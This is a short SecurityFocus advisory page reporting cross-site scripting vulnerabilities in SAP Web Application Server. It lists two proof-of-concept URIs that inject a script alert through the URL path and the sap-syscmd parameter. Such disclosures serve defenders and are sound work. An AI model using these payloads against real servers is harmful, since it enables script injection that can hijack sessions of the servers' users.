Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SAP Web Application Server Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/sap/bc/BSp/sap/index.html%3Cscript%3Ealert('xss')%3C/script%3E
http://www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap-sessioncmd=open&sap-syscmd=%3Cscript%3Ealert('xss')%3C/script%3E







 

Privacy Statement
Copyright 2009, SecurityFocus